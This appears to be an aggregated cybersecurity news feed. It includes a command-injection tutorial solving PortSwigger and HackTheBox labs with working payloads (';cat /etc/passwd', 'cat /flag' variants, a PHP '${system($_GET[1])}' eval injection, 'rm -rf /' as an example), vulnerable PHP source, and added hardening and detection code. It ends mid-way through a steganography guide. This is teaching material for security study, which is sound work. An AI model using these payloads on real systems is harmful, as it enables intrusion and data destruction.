WhatsApp has identified a spyware campaign targeting approximately 90 individuals, including journalists and civil society members, linked to the Israeli firm Paragon Solutions. The post Israeli Spyware Firm Paragon Linked to WhatsApp Zero-Click Attack appeared first on ZENDATA Cybersecurity.

by Zendata

Google has released the February 2025 Android security update, addressing a total of 48 vulnerabilities, including an actively exploited zero-day flaw tracked as CVE-2024-53104. The update is available for Android 12 through Android 15 devices and contains fixes for multiple security issues across the Framework, System, Kernel, and vendor components. The actively exploited vulnerability, tracked … The post Google Fixes Zero-Day Flaw Exploited in Targeted Android Attacks appeared first on CyberInsider.

by Cyber Insider

CISA's FOCAL Plan, which aims to standardize the cybersecurity operations of federal civilian agencies, marks an important step in the federal government's efforts to strengthen cyber defenses and reduce agency risk. Learn how Tenable One for Government, which recently achieved FedRAMP Authorization, aligns to the FOCAL Plan key priorities.

Each Federal Civilian Executive Branch (FCEB) agency has a unique role in supporting the mission of the U.S. federal government, from national security to healthcare to education. However, agencies' approaches to managing cyber risk vary widely, with each agency operating independent networks with interconnected systems and varying degrees of cyber risk tolerance. This complexity makes managing exposures across the FCEB a complex challenge and drives the need for a coordinated cybersecurity strategy.

To address this issue, the Cybersecurity and Infrastructure Security Agency (CISA) recently unveiled the "Federal Civilian Executive Branch (FCEB) Operational Cybersecurity Alignment (FOCAL) Plan." It's designed to enhance cybersecurity across the FCEB by standardizing essential components of operational cybersecurity throughout the federal enterprise and enabling a collective defense approach. It provides actionable steps federal agencies can take, with their varied architectures and risk management strategies, to mitigate cyber risks and improve resilience through a unified approach to operational defense. And while it is not an exhaustive list of all the things agencies must do to secure their missions, it does provide a baseline for agencies to focus resources on those actions that substantially advance operational cybersecurity improvements and alignment goals.

[Figure: CISA's FOCAL Plan priority areas (Source: "Federal Civilian Executive Branch (FCEB) Operational Cybersecurity Alignment (FOCAL) Plan," CISA, September 2024.)]

Asset Management

To safeguard federal networks, agencies must have comprehensive visibility into their entire infrastructure, and continuously assess how those assets are interconnected. As the old saying goes: "You can't protect what you can't see." This priority area aims to ensure agencies know what assets they have so they can be properly defended. It's important to remember that assets span far beyond traditional IT assets. As recent mandates and CISA Binding Operational Directives (BOD) have stressed, agencies must have visibility into OT, IoT, cloud and identity assets. Look no further than the Office of Management and Budget (OMB)'s Memorandum M-24-04, which directed federal civilian departments and agencies to inventory their IoT and OT assets by the end of fiscal year 2024.

Vulnerability Management

Getting an accurate inventory of your assets is a key first step, but it's equally fundamental to understand the vulnerabilities on each of those assets so that you can proactively secure the attack surface. As the FOCAL Plan points out: "What constitutes an agency's enterprise has evolved over the years, particularly as the attack surface has expanded and grown more complicated." This has made vulnerability management more challenging. The FOCAL Plan focuses on proactive vulnerability management, so that agencies can understand their exposures by identifying, assessing and mitigating vulnerabilities across asset types, before an attacker can exploit them.

Defensible Architecture

Because attacks are inevitable and resilience is critical, this priority area focuses on building robust, defensible infrastructures with principles like segmentation, identity management and zero-trust security. With a focus on limiting an attacker's ability to access sensitive data when a compromise occurs, this priority aims to help agencies minimize impact and operational disruptions through the implementation of proper tools and controls.

Cyber Supply Chain Risk Management (C-SCRM)

FCEB agencies often rely on third-party vendors, which can introduce supply chain risk. This priority addresses the risk posed by external vendors and technologies by ensuring agencies can quickly identify, assess and mitigate vulnerable software and hardware from their suppliers and partners. Case in point: the critical Log4j vulnerability, known as Log4Shell, a critical remote code execution vulnerability in Apache's Log4j software library. This vulnerability posed a massive risk due to the widespread use of the Apache Log4j open-source logging library in many enterprise applications and cloud services, and the ease with which the vulnerability could be exploited. In the days that followed, every agency and industry security practitioner had to detect all instances of Log4j in their environment. In many cases, versions of the offering were buried deep within third-party software packages or government off-the-shelf solutions. Agencies with a complete understanding of the software deployed across their environment were able to quickly respond to the threat, and meet or exceed the deadline established by the CISA Emergency Directive (ED) 22-02. Unfortunately, Log4Shell quickly became a crisis for security teams that did not have a complete understanding of their inventory.

Incident Detection and Response

This priority area is geared towards strengthening the ability of security operations centers (SOCs) to detect, respond to, and mitigate cyberattacks rapidly and effectively. As mentioned earlier, attacks are inevitable, so it's critical to quickly detect and respond to an attack. Combining rapid detection and response with best practices such as segmentation and identity management will further disrupt an attacker's ability to access sensitive data.

Meeting CISA FOCAL Plan priorities with Tenable One

We're excited to share that Tenable One is now FedRAMP authorized at the moderate impact level. Tenable One for Government is an exposure management platform designed to help agencies radically unify security visibility, insight and action across the attack surface to rapidly expose and close the gaps that put agencies at risk. Tenable One for Government helps agencies meet CISA FOCAL Plan priorities with:
Centralized visibility of all assets across the attack surface, from IT infrastructure to cloud environments to critical infrastructure, containers, identity systems, web applications and everywhere in between.
Vulnerability enumeration and prioritization so you can pinpoint priority weaknesses and focus on the actual exposures that matter to quickly reduce cyber risk.
A defensible architecture based on zero trust principles so you can quickly detect and respond to attacks in real time, map attack paths and surface all the possible steps that attackers could take to move laterally, escalate privileges and gain control of your infrastructure.
A deep understanding of overall cyber risk with risk metrics and exposure scores to easily identify problem areas across your agency infrastructure. You can then set precise, trackable KPIs and SLAs to hold teams accountable for managing risk.

Learn more:
The white paper "CISA FOCAL Plan: Aligning Cybersecurity Across Federal Agencies with Tenable One"
"Tenable One for Government" datasheet

by Tenable

An investigation into more than 300 cyberattacks against US K–12 schools over the past five years shows how schools can withhold crucial details from students and parents whose data was stolen.

by WIRED Security News

In this tutorial, we’re going to walk step by step through creating an npm package using modern best practices (as of 2022).

by Snyk

Apple’s push for shorter certificate lifespans is more than a compliance update; it’s a strategic move toward quantum-resilient security. With quantum computing threatening traditional encryption, automation and cryptographic agility are essential. Businesses that adopt automated certificate lifecycle management now will not only meet compliance but also be well-positioned for post-quantum cryptography. The shift to a 47-day certificate lifecycle is a wake-up call—those who act today will lead in the next cybersecurity era.

by Sectigo

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Edge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file while in Internet Explorer mode. The ZDI has assigned a CVSS rating of 7.5.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target host system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-0413.

by Zero Day Initiative Advisories

Anthropic says its Constitutional Classifiers approach offers a practical way to make it harder for bad actors to try and coerce an AI model off its guardrails.

by Dark Reading

Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 gift card.

by Dark Reading

Though Windows, iOS, and macOS users won't need to make any changes, Android users are advised to remove their Defender VPN profiles.

by Dark Reading

Adversaries looking to ride the DeepSeek interest wave are taking advantage of developers in a rush to deploy the new technology, by using AI-generated malware against them.

by Dark Reading

Researchers at Cisco Talos warn that a new phishing campaign is targeting users in Germany and Poland in an attempt to deliver several strains of malware, including a new backdoor dubbed “TorNet.”

by KnowBe4

Cybercriminals posted nearly 6,000 breaches to data-leak sites last year — and despite significant takedowns, they continued to thrive in a record-breaking year for ransomware.

by Dark Reading

DPRK 'Contagious Interview' campaign continues to target Mac users with new variants of FERRET malware and Github devs with repo spam. The post macOS FlexibleFerret | Further Variants of DPRK Malware Family Unearthed appeared first on SentinelOne.

by SentinelOne

Explore industry moves and significant changes in the industry for the week of February 3, 2025. Stay updated with the latest industry trends and shifts.

by SecurityWeek

This webcast originally aired on January 23, 2025. In this video, Ralph May discusses Orbit, a tool he developed for enhanced vulnerability scanning and continuous pen testing. The video delves […] The post Introducing ORBIT, Scan Targets and Clients at Scale appeared first on Black Hills Information Security.

by Black Hills Information Security

Command injection is a critical vulnerability that enables attackers to execute unauthorized commands on a system. In this blog, we’ll explore both whitebox and black box approaches for detecting and these risks. Join us as we break down effective strategies to detect this vulnerability in your infrastructure. Before we dive into this topic we must understand what is a shell metachracter and what is a payload in terms to command injection. Shell Metacharacters (Cybersecurity POV, With Example) In Linux, we use ls ; whoami to execute both commands sequentially—ls lists files, and whoami reveals the current user. Similarly, in command injection, attackers exploit shell metacharacters to sneak malicious payloads alongside valid HTTP parameters without breaking the application’s expected functionality. For example, if an app executes ping 127.0.0.1, an attacker could send ping 127.0.0.1 ; cat /etc/passwd to execute both commands while keeping the original request intact. Definition of Payload The payload consists of shell metacharacters (&, &&, |, ||, ;, \n, >, <, $()) and their URL-encoded versions (%26, %26%26, %7C, %7C%7C, %3B, %0A, %3E, %3C, %24%28%29). These characters are used to chain, execute, and manipulate commands, making them essential for testing and exploiting command injection vulnerabilities. Black Box approach To begin with blackbox refers to scenario where we don’t have access to source code and in whitebox testing we have access to source code. Now the following slide from Rana Khalil is extremely useful in understanding the black box approach. 1. OS command injection, simple case Lab URL - https://portswigger.net/web-security/os-command-injection/lab-simple First we fuzz for valid shellmeta-chracters that the application takes as input. You may use the following custom wordlist and fuzz along side each input parameters to find the shell metachracter that is accepted. This wordlist contains URL encoded values as well. 
/home/mccleod/custom via 🐍 v3.8.10 took 12s ❯ cat shell-metachracters.txt & && | || ; \n > < $() %26 %26%26 %7C %7C%7C %3B %0A %3E %3C %24%28%29 Now in the application, we click on every possible clicks, and we see an interesting option called check stock, and behind the scenes we notice that this is an POST request. Now let’s fuzz for shell metacharacters along side productId and storeId, and see what happens. Add payload insertion points in the following area, and make sure you have selected battering ram attack option. Make sure you copy and paste payloads from shell-metacharacters.txt. And start your attack. We see couple of interesting responses. /n and$() return numbers like 32 and 42 and the $ character does not return much anything but at same time does not give errors like the rest of the metacharacters. Note that do not do this mistake of entering payload at two points in a single instance. Why because what if productId is not vulnerable but storeId is? in that case we have to separately fuzz for each point, as a rule of thumb remember always fuzz one parameter or one endpoint at a time. We see interestingly ; character gives us insight of an shell script and interesting details like the location of the script. The same holds true even ; character is URL encoded. Finally after a lot of trail and error we see that payloads with metacharacters like %oa, | and ; work in the payload. Even the url -encoded ones work well in this lab With this we solve the lab. But remember when we fuzzed with ; value as input, we found the location of an shell script? Let’s take an look at the script for better understanding on why this command injection vulnerability arises. Now if we use cat linux command to have a look at stockreport.sh then we see that eval function is used. Using eval on unsanitized input allows arbitrary code execution, enabling an attacker to inject and execute malicious commands. 
2. Lab: Blind OS command injection with time delays

Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays

This lab is very similar to the previous one and serves as good reinforcement for the methodology we learnt there.

Step 1: Click every button and look for interesting requests and/or endpoints.
Step 2: Once an endpoint is found, fuzz every input field with shell metacharacters to find which one works.
Step 3: Once you find a valid shell metacharacter such as | or ;, test for command injection with payloads like ;whoami or |whoami.
Step 4: Since this lab is about time delays, we need a command whose execution takes a measurable time, such as sleep or a ping to localhost with a fixed packet count:

sleep 10
ping -c 10 127.0.0.1

Looking at Burp Suite, unlike the previous lab there is no "check stock" function, but in the top right corner there is a "Submit feedback" link. Let's try that out.

With trial and error we find that the email parameter is vulnerable to command injection. But something is wrong: even when we URL-encode payloads such as ; sleep 10 or | sleep 10, we still do not get the delay.

Remember that in SQL injection we used a comment delimiter to comment out the rest of the query, which would otherwise produce syntax errors from our input? In command injection we can use # (the hash symbol) the same way, to comment out whatever the application appends after our input. When we add # and URL-encode the payload with Ctrl+U, we get a 10-second delay, which solves the lab.

3. Lab: Blind OS command injection with output redirection

Lab URL: https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection

Some readers might feel this section is CTF-ish, or ask what the point of output redirection is if a command can already be executed directly on the server. Well, you have a point, and the only reason I have included this is that it forced me to think outside the box and made me wonder: can we take command injection beyond simply executing arbitrary commands on the server? The answer is yes. In this lab we execute a command, redirect its output to a text file, and then read that file back through a local file inclusion (LFI) style parameter. Let that sink in for a moment; if it sounds bizarre, I hope it is clear by the end of this section.

At first glance we see a feedback form similar to the one in the previous exercise. We fuzz each parameter with metacharacters such as |, || and ;, and find that when we try ;whoami or |whoami in the name parameter the server responds with "could not save". Since we do not have the source code, our best bet is to assume that the application is configured so that command output is not displayed unless it is saved somewhere. Recall that in Linux the > or >> operator redirects output to a file, so let's do that here as well: we redirect the output into /var/www/images, the writable directory given in the lab description, creating a new file called output.txt (note that > creates the file if it does not exist).

Still we get the same "could not save" error. Next we add the # delimiter to comment out whatever follows our input. Still the same error, so our last resort is to URL-encode the payload so that the server parses it as intended; Ctrl+U URL-encodes the selection in Burp Suite. Now the payload is processed. If you run into any error at this point, just reset the lab. Feel free to try other shell metacharacters such as & as well.

Now how do we retrieve the file? Looking around the web page we see a lot of images; if we right-click one and view the image, the URL looks like the following:

https://0a3c008f04204dc4821d792b006b008e.web-security-academy.net/image?filename=7.jpg

Do you see the parameter ?filename=7.jpg? What if we change 7.jpg to output.txt? Will we be able to read files from that specific directory, /var/www/images? Let's try it. When we change the filename to output.txt we see the output of the whoami command, and with this we solve the lab.

White box approach

1. Looking Glass

Lab URL: https://app.hackthebox.com/challenges/looking%20glass/

At first glance we are given a website that pings an IP address, and notice how realistic the ping output is: it looks exactly as if the ping command were executed on a Linux machine and its output displayed. If ping can be executed, what if the server can execute other Linux commands too? Let's try the following:

10.30.18.29; ls ../

With a basic shell metacharacter we are able to execute any Linux command. So let's not waste time and get the flag; we can use cat to read it:

10.30.18.29; cat ../flag_b1ubZ

With this we get our flag. But things are not that much fun: we got the flag with one basic Linux command, which is not very interesting.

Source Code Analysis

Since we can execute commands, let's look at what other files are present in the current directory:

10.30.18.29; ls

We see a file called index.php. Let's read its source code directly with the following command:

10.30.18.29; cat index.php

With the above command we get the source code of index.php. Our eyes are fixated on the runTest function, which looks exactly like the following lines.
function runTest($test, $ip_address) {
    if ($test === 'ping') {
        system("ping -c4 ${ip_address}");
    }
    if ($test === 'traceroute') {
        system("traceroute ${ip_address}");
    }
}

The PHP code is vulnerable to command injection in both its ping and traceroute features because it uses unsanitized user input directly in shell commands. Specifically, the runTest function takes the user-controlled value from $_POST['ip_address'] and inserts it without any filtering into system("ping -c4 ${ip_address}") and system("traceroute ${ip_address}"). This lack of validation or sanitization means that an attacker can append shell operators (such as ;, && or |) to the ip_address input to run arbitrary commands (for example, 8.8.8.8; rm -rf /). Additionally, although the input field is pre-filled with the user's IP address via <?= getUserIp() ?>, it remains editable, so anyone can change it to a malicious value.

2. TimeKORP

Lab URL: https://app.hackthebox.com/challenges/TimeKORP

Before we dive into the technicalities, let's have a look at the payloads that work:

'+%0a+cat+/flag+%0a+'
'%3b+cat+/flag+||+'
'%3b+cat+/flag+%3b+%23'
'%3b+cat+/flag+%3b'

The logic for these payloads is based on the source code. To sum up, a payload consists of the following pieces:

[singlequote][space][shell-metacharacter][space]cat /flag[space][shell-metacharacter][singlequote]

Now let's dive into the source code to understand why this works and how we arrived at this payload. Even though this challenge is labelled very easy, it gets tricky: some shell metacharacters such as & may not work, and worse, ls and other Linux commands might not return anything meaningful. The source code for this challenge is no longer on the HackTheBox platform, but CryptoCat breaks it down in his YouTube video, which is worth checking out.

Source Code Analysis

In TimeController.php:

$format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
$time = new TimeModel($format);

In TimeModel.php:

public function __construct($format) {
    $this->command = "date '+" . $format . "' 2>&1";
}

public function getTime() {
    $time = exec($this->command);
    return isset($time) ? $time : '?';
}

After glancing at TimeController.php and TimeModel.php we come to the following conclusions:

Direct user input in a shell command: the user-supplied format parameter is concatenated directly into a shell command.
Shell command execution: the code uses PHP's exec() function to run the command, forming date '+[user_input]' 2>&1.

How the exploit works

When an attacker sends a payload like +%0a+cat+/flag+%0a+, %0a represents a newline, so cat /flag lands on its own command line. Flattened onto one line, the command becomes:

date '+ cat /flag ' 2>&1

Similarly, payloads like ; cat /flag ; inject additional commands using ; as a separator. Although the injection succeeds, "Permission denied" errors can occur because the web app runs under restricted permissions, preventing access to sensitive files. This is a classic command injection vulnerability (CWE-78) caused by insufficient input sanitization and validation.

3. LoveTok

Lab URL: https://app.hackthebox.com/challenges/LoveTok/walkthroughs

This application also has a format parameter, and by understanding the source code we come up with a unique payload. First let's look at the payloads; then we will dive into the inner mechanics.

/?format=${system($_GET[1])}&1=whoami
${system($_GET[cmd])}&cmd=ls /

We see that despite the error shown, commands like whoami execute successfully in the web application.

Source Code Analysis

We are given the source as a zip file, and four PHP files grab our attention:

a. TimeModel.php

class TimeModel
{
    public function __construct($format)
    {
        // The format string is "sanitized" by addslashes
        $this->format = addslashes($format);

        // A time offset string is built using random values.
        [ $d, $h, $m, $s ] = [ rand(1, 6), rand(1, 23), rand(1, 59), rand(1, 69) ];
        $this->prediction = "+${d} day +${h} hour +${m} minute +${s} second";
    }

    public function getTime()
    {
        // The critical part: eval() is used to build a date string
        eval('$time = date("' . $this->format . '", strtotime("' . $this->prediction . '"));');
        return isset($time) ? $time : 'Something went terribly wrong';
    }
}

What is happening in the above piece of code?

Input handling: the constructor accepts a $format parameter and uses addslashes() to escape certain characters (quotes and backslashes). However, escaping with addslashes() is not enough when the input is later used in an eval() context.
Dynamic code construction: in getTime(), the code builds a PHP statement that calls date(). It concatenates the (escaped) format string directly into the code string and then passes it to eval().
Risk: because eval() executes its input as PHP code, any code injected through $format is executed on the server.

b. TimeController.php

class TimeController
{
    public function index($router)
    {
        // Directly taking a GET parameter and passing it to TimeModel
        $format = isset($_GET['format']) ? $_GET['format'] : 'r';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
}

What is happening in the above piece of code? The controller takes the format parameter from the URL (i.e., user input) and passes it directly to TimeModel without further sanitization. This means an attacker can supply a malicious string in the format parameter.

c. index.php and Router.php

// index.php snippet:
date_default_timezone_set('UTC');

spl_autoload_register(function ($name) {
    if (preg_match('/Controller$/', $name)) {
        $name = "controllers/${name}";
    } else if (preg_match('/Model$/', $name)) {
        $name = "models/${name}";
    }
    include_once "${name}.php";
});

$router = new Router();
$router->new('GET', '/', 'TimeController@index');
$response = $router->match();
die($response);

What is happening in the above piece of code? The file sets up autoloading for classes, defines a basic route (mapping the root URL / to TimeController@index), and then processes the request. There is no additional sanitization here; the vulnerability propagates from the user input all the way down into TimeModel.

How the exploit payload works

The payload given is:

/?format=${system($_GET[1])}&1=whoami

Let's break it down.

a. The payload components

format parameter: the value passed is ${system($_GET[1])}. In the context of the code, after addslashes(), the value still ends up inside a string that is eventually passed to eval().
1 parameter: this parameter is set to whoami. It is accessed within the injected code via $_GET[1].

b. Injection mechanics

String creation: the user-supplied format parameter contains no quotes or backslashes, so addslashes() leaves it untouched and it remains exactly ${system($_GET[1])}.
Using eval(): when eval() is called, it builds and executes a PHP statement that looks like:

$time = date("${system($_GET[1])}", strtotime("..."));

Because the string is double-quoted, PHP processes the ${...} syntax, executing the code inside it.
Code execution: the expression ${system($_GET[1])} triggers the system() function with the parameter $_GET[1]. Since the URL provides &1=whoami, it executes system("whoami").
Result: the output of the whoami command is displayed, proving that arbitrary commands can be executed on the server.

Why addslashes() fails here

Purpose of addslashes(): this function escapes quotes and backslashes, and was historically used so that strings could be placed in contexts like database queries (to prevent simple SQL injection).
Inadequacy for eval(): addslashes() does not neutralize PHP code when that code is later executed by eval(). The dangerous parts (the ${...} syntax for variable interpolation and function calls) are not removed. As such, even after escaping, the malicious string still results in executable PHP code within the eval() call.

Where to go from here?

One thing you can do is work through these challenges alongside reading this blog, and if you have already done most or all of them, try the HackTheBox challenge called hsa, which revolves around understanding the source code and applying the concept of command injection via output redirection that we learnt in lab 3.

One of the common questions I struggled with is how much programming or coding is required in cybersecurity. Some say none, but if you are planning to do web application pentesting, then learning to review source code and find vulnerabilities in it is a valuable skill. That being said, it definitely helps to have a developer background, but that does not always have to be the case. At the very least one should be comfortable reading code and understanding what is happening under the hood, or at bare minimum be willing to dig into bits of code and deepen one's understanding using Google, YouTube and ChatGPT.

Stay tuned for more interesting blogs in which we will deep dive into each vulnerability.
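The three white-box snippets above share one root cause: request data reaches system(), exec() or eval() unchanged. The block below is an added example written for this write-up, not code from the Looking Glass, TimeKORP or LoveTok challenges, showing how each would be fixed with input validation and by not handing the value to a shell or to eval() at all. The function names (runTestSafe, currentTimeSafe, predictedTimeSafe) and the small allowlist of date(1) directives are this example's own choices.

```php
<?php
// Added example: hardened counterparts of the vulnerable snippets analysed
// above. Not the challenges' own code; function names are this example's own.

/**
 * Looking Glass: allowlist the test name, validate the value as an IP
 * address, and quote every argument so shell metacharacters never reach
 * the command line.
 */
function runTestSafe(string $test, string $ipAddress): string
{
    $commands = [
        'ping'       => ['ping', '-c4'],
        'traceroute' => ['traceroute'],
    ];
    if (!isset($commands[$test])) {
        return 'error: unknown test';
    }
    // FILTER_VALIDATE_IP rejects "10.30.18.29; ls ../" outright, and a valid
    // IP cannot start with "-", which also rules out option injection.
    $ip = filter_var(trim($ipAddress), FILTER_VALIDATE_IP);
    if ($ip === false) {
        return 'error: invalid IP address';
    }
    // escapeshellarg() single-quotes each argument as a second layer.
    $argv = array_map('escapeshellarg', [...$commands[$test], $ip]);
    $output = [];
    exec(implode(' ', $argv), $output);
    return implode("\n", $output);
}

/**
 * TimeKORP: the format was spliced raw into "date '+...'". Do not shell out
 * at all: PHP's date() treats its argument as a format, never as a command.
 * A few common date(1) directives are mapped onto date() characters.
 */
function currentTimeSafe(string $format): string
{
    // Allowlist of date(1) directives this example supports (assumption).
    $map = ['%H' => 'H', '%M' => 'i', '%S' => 's', '%Y' => 'Y', '%m' => 'm', '%d' => 'd'];
    if (!preg_match('/^(%[HMSYmd]|[ :\/-])+$/', $format)) {
        return '?';
    }
    return date(strtr($format, $map));
}

/**
 * LoveTok: addslashes() never made eval() safe; the fix is to call date()
 * directly so "${system(...)}" is just a format string, never interpolated.
 */
function predictedTimeSafe(string $format): string
{
    [$d, $h, $m, $s] = [rand(1, 6), rand(1, 23), rand(1, 59), rand(1, 59)];
    $prediction = sprintf('+%d day +%d hour +%d minute +%d second', $d, $h, $m, $s);
    $ts = strtotime($prediction);
    // date() renders format letters and copies every other character
    // literally; nothing in $format is evaluated.
    return $ts === false ? 'Something went terribly wrong' : date($format, $ts);
}

// Demo with the payloads quoted in the write-ups: each is rejected or rendered
// as text, and no shell command or PHP code runs.
echo runTestSafe('ping', '10.30.18.29; ls ../'), "\n";
echo currentTimeSafe("' ; cat /flag ; #"), "\n";
echo currentTimeSafe('%H:%M:%S'), "\n";
echo predictedTimeSafe('${system($_GET[1])}'), "\n";
```

Run it with php on the command line. The demo deliberately never reaches exec(): a rejected value returns before any process is spawned, which is the property to look for in a review. Where a shell really is unavoidable, validation against an allowlist (here, a syntactically valid IP) is the primary control and escapeshellarg() the backstop, never the other way round.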
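For the two blind labs above (time delays and output redirection), the signals a defender has are the same ones the tester relied on: URL-encoded shell metacharacters, sleep or ping with a packet count, redirection into a web-served directory, and a trailing # comment. The following is an added example, not part of the PortSwigger labs or of this blog, of a small server-side check that decodes a form body and reports which parameters carry those indicators. The function names and the sample request body are constructed for the demo.

```php
<?php
// Added example: indicator check for blind command-injection probes in
// request parameters. Not from the labs or the blog; names are this
// example's own and the sample body is constructed.

/**
 * Inspect one decoded parameter value and return the indicators found.
 * Returns an empty array when nothing looks like a shell injection probe.
 */
function commandInjectionIndicators(string $value): array
{
    $found = [];
    // Shell metacharacters that chain or substitute commands.
    if (preg_match('/[;|&`\n]|\$\(/', $value)) {
        $found[] = 'shell-metacharacter';
    }
    // Time-based probes: sleep N, or ping with an explicit packet count.
    if (preg_match('/\bsleep\s+\d+/', $value) || preg_match('/\bping\s+-c\s*\d+/', $value)) {
        $found[] = 'time-delay';
    }
    // Output redirection into a file path.
    if (preg_match('/>{1,2}\s*\S+/', $value)) {
        $found[] = 'output-redirection';
    }
    // A trailing comment character used to discard the rest of the command line.
    if (preg_match('/#\s*$/', $value)) {
        $found[] = 'trailing-comment';
    }
    return $found;
}

/**
 * Scan a raw, still URL-encoded form body and return param => indicators
 * for every parameter that triggered at least one check.
 */
function scanFormBody(string $rawBody): array
{
    $report = [];
    foreach (explode('&', $rawBody) as $pair) {
        [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
        // Decode first: the probes in the labs only worked once URL-encoded,
        // so matching on the raw body would miss %3B, %7C and %23.
        $indicators = commandInjectionIndicators(urldecode($value));
        if ($indicators !== []) {
            $report[urldecode($name)] = $indicators;
        }
    }
    return $report;
}

// Constructed sample body: one benign field and two probe-like fields
// shaped like the lab payloads (email with a sleep, name with a redirect).
$sampleBody = 'csrf=abc123&email=user%40example.com%3Bsleep+10+%23'
            . '&name=%7C%7Cwhoami%3E%2Fvar%2Fwww%2Fimages%2Foutput.txt+%23';

foreach (scanFormBody($sampleBody) as $param => $indicators) {
    printf("%s: %s\n", $param, implode(', ', $indicators));
}
```

This is logging and detection, not a fix: a pattern list like this is easy to evade and belongs in a WAF rule or an application log hook that raises an alert, while the actual remediation is to stop passing request data to a shell at all. Its value here is operational, since a burst of parameters matching time-delay or output-redirection is exactly the trace the two blind labs leave behind.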

by HACKLIDO

We are excited to share that CRN has named Barracuda’s Patrick O’Donnell, senior vice president of Americas sales, and Greg Saenz, vice president of channels for the Americas, to its prestigious list of 2025 Channel Chiefs.

by Barracuda

As many as 768 vulnerabilities with designated CVE identifiers were reported as exploited in the wild in 2024, up from 639 CVEs in 2023, registering a 20% increase year-over-year. Describing 2024 as "another banner year for threat actors targeting the exploitation of vulnerabilities," VulnCheck said 23.6% of known exploited vulnerabilities (KEV) were known to be weaponized either on or before

by The Hacker News

An Italian investigative journalist said he was the target of a spyware attack disclosed by WhatsApp.

by TechCrunch

Welcome to the Threat Context Monthly blog series where we provide a comprehensive roundup of the most relevant cybersecurity news and threat information from KrakenLabs, Outpost24’s cyber threat intelligence team. Here’s what you need to know from January. Threat actor of the month: Funksec ransomware “Funksec ransomware” is a threat group active at least since […] The post Threat Context monthly: Executive intelligence briefing for January 2025 appeared first on Outpost24.

by Outpost24

The maintainers of the Python Package Index (PyPI) registry have announced a new feature that allows package developers to archive a project as part of efforts to improve supply chain security. "Maintainers can now archive a project to let users know that the project is not expected to receive any more updates," Facundo Tuesca, senior engineer at Trail of Bits, said. In doing so, the idea is to

by The Hacker News

This week, our news radar shows that every new tech idea comes with its own challenges. A hot AI tool is under close watch, law enforcement is shutting down online spots that help cybercriminals, and teams are busy fixing software bugs that could let attackers in. From better locks on our devices to stopping sneaky tricks online, simple steps are making a big difference. Let's take a

by The Hacker News

Welcome to this CTF Forensics blog series, where we explore various forensic techniques commonly encountered in cybersecurity competitions. In Capture The Flag (CTF) challenges, forensic tasks require participants to analyze digital artifacts, uncover hidden information, and extract valuable data using specialized tools and techniques. This series will cover key forensic topics, including steganography, network analysis with Wireshark, PDF analysis, and disk image forensics, providing insight into how these methods are applied in real-world scenarios.

In this first installment we dive into steganography, a technique used to embed hidden information within digital files such as images, audio, and video. By the end of this post you will have a solid understanding of steganographic methods, common CTF challenges, and the tools required to reveal hidden data.

What is Steganography?

Steganography comes from the Greek words steganos (hidden) and graphein (writing), meaning "hidden writing". It is a technique for embedding data within digital media in a way that is not immediately obvious. In CTF challenges, steganographic techniques are often used to hide flags inside images, audio files, or even metadata. Unlike encryption, which scrambles data to protect its contents, steganography conceals the existence of the data itself. A seemingly normal image may contain a secret message hidden in its least significant bits (LSB), or an audio file might carry encoded text within its waveform. Without the right tools, these hidden messages remain undetected.

Common Methods and Tools Used

Strings

The strings command is a simple yet powerful tool that extracts human-readable text from binary files. It scans a file for sequences of printable characters, making it useful for finding hidden messages in images, executables, and other binary files. In CTF challenges, strings is often the first tool used to check for embedded plaintext flags or hints inside a file.

Common commands:

Extract all printable strings from a file:
strings Image_name

Filter results for a specific keyword (e.g. "flag"):
strings Image_name | grep "flag"

Limit output to strings of at least a certain length (e.g. 6 characters):
strings -n 6 Image_name

ExifTool

ExifTool is a powerful metadata tool that reads and modifies metadata in many file formats, including images, PDFs, and videos. In CTFs, metadata often contains hidden information such as author names, GPS coordinates, or even embedded messages. It is especially useful for analyzing JPEG, PNG, and PDF files, where metadata manipulation is common.

Common commands:

Display all metadata from a file:
exiftool file_name

Search for a specific keyword in the metadata (e.g. "Author"):
exiftool file_name | grep "Author"

Hex Analysis

Hex analysis is essential in CTF forensics for examining the raw hexadecimal representation of a file. Hidden data, embedded flags, and file signatures are often visible only in hex. By analyzing a file's hexadecimal content you can detect anomalies, uncover hidden messages, and even recover corrupted files.

Common tools for hex analysis:

Windows: HxD, WinHex, 010 Editor
Linux (CLI-based): xxd, hexdump
Linux (GUI-based): Bless, GHex

These are the hex editors most people use. Hex analysis is where you can spot hidden data or embedded files (for example a ZIP archive appended to an image), and it is also how you check a file's magic bytes.

Zsteg

zsteg is a command-line tool designed to detect steganography in PNG and BMP files. It specializes in identifying Least Significant Bit (LSB) steganography, a common technique for hiding data in images. zsteg scans the different color channels and bit planes, revealing hidden messages that may be embedded within an image.

zsteg file.png

Binwalk

binwalk is a tool for analyzing and extracting embedded data from binary files. It is commonly used in CTF forensics challenges to uncover hidden files, compressed data, firmware images, and steganographic payloads within different file types. It works by scanning a file for the signatures of known file types and can extract the hidden contents automatically.

Analyze a file for embedded data:
binwalk file_name

Extract hidden files automatically:
binwalk -e file_name

Steghide

Steghide is a popular command-line tool for hiding and extracting data in files such as JPEG, BMP, WAV, and AU. It supports both embedding and extraction, with an option to encrypt the hidden data using a passphrase. This makes it particularly common in CTF challenges where flags or other data are concealed inside multimedia files.

Hide a file inside an image (or audio file) with encryption:
steghide embed -cf cover_image.jpg -ef secret.txt

Extract hidden data from a file:
steghide extract -sf cover_image.jpg

Check whether a file contains hidden data:
steghide info cover_image.jpg

Stegsolve

Stegsolve is a Java-based tool for analyzing images that may contain information hidden with steganographic techniques. It is particularly effective for images in which data may be concealed using methods like Least Significant Bit (LSB) manipulation. Stegsolve provides several filters and analysis modes that let you inspect individual color channels, bit planes, and image transformations to reveal hidden messages or patterns. Use File > Open to load an image, then use the arrow keys to step through the analysis modes.

SigBits

